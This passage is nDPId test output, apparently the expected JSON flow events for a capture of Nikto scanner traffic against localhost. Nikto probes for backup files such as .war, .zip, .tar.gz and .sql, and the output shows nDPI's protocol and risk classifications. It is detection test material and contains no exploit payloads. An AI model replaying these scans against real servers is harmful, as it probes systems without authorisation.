{"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
